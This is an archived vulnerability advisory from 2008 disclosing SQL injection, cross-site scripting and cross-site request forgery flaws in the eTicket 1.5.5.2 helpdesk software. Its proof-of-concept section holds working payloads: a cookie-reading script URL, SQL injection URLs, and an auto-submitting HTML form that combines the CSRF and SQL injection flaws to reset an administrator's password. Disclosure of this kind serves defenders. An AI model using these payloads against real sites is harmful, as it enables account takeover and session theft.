what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

eticket-multi.txt

eticket-multi.txt
Posted Jan 7, 2008
Authored by L4teral

eTicket version 1.5.5.2 suffers from SQL injection, cross site scripting, and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, xss, sql injection, csrf
SHA-256 | 5de548b7db26deeb99097b6cfbf56a779aadc04c0a563fa63246a1583a65bf75

eticket-multi.txt

Change Mirror Download
======================================================================
eTicket 1.5.5.2 Multiple Vulnerabilities
======================================================================

Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting
Cross Site Request Forgery
SQL Injection
Status: patch not available


------------------------------
Affected software description:
------------------------------

Application: eTicket
Version: 1.5.5.2 (other versions may also be affected)
Vendor: http://eticket.sourceforge.net

Description:
eTicket is a PHP-based electronic (open source) support ticket system
based on osTicket, that can receive tickets via email (pop3/pipe) or
a web form. It also offers a ticket manager with many features.
An ideal helpdesk solution for any website.


--------------
Vulnerability:
--------------

1. The variable 's' is not properly sanitized leading to
cross site scripting.

2. The script admin.php is prone to sql injections (admin
privileges required).

3. The search of the application is prone to sql injection, which
can be used to obtain login credentials or perform other
malicious taks.
The parameters 'status', 'sort' and 'way' are not properly
sanitized before being used in a sql query.
Exploitation requires valid user credentials, but as any user
is able to create a ticket, an attacker can obtain valid login
data without any problems.

4. The application is vulnerable to cross site request forgery.
Combined with the "my account" part of the application
being prone to sql injection, the password of an admin
account can be set to an arbitrary value by just visiting
a specially crafted website wile being logged in to the
application. Normally, the current password has to be entered
to change the password of an account. This can be circumvented
in the described way by combining the two vulnerabilities.


------------
PoC/Exploit:
------------

1.
http://localhost/eTicket/view.php?s="><script>alert(document.cookie)</script>

2.
http://localhost/eTicket/admin.php?a=headers&msg=SQL'

3.
http://localhost/eTicket/search.php?s=advanced&text=test&cat=&status=open'SQL&search_submit=Search

4.
By visiting a page containing the following code, the password of a
logged in administrator will be set to "hacked".

<html>
<body>
<form id="csrf" name="csrf"
action="http://localhost/eTicket/admin.php?a=my" method="post">
<input type="hidden" name="a" value="my">
<input type="text" name="username" value="admin"><br>
<input type="text" name="name" value="admin"><br>
<input type="text" name="email" value="mail@example.org"><br>
<input type="password" name="password" value="') OR ('1'='1"><br>
<input type="password" name="npassword" value="hacked"><br>
<input type="password" name="vpassword" value="hacked"><br>
<textarea name="sig" cols="30" rows="5"></textarea><br>
<input type="submit" name="submit" value="Save Changes"><br>
</form>
<script language="JavaScript">document.getElementById('csrf').submit.click()</script>
</body>
</html>


---------
Timeline:
---------

2007-11-19 - vendor informed
The vendor responded, but after multiple attempts i did not get
a statement whether these vulnerabilities will get fixed
in a new version.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close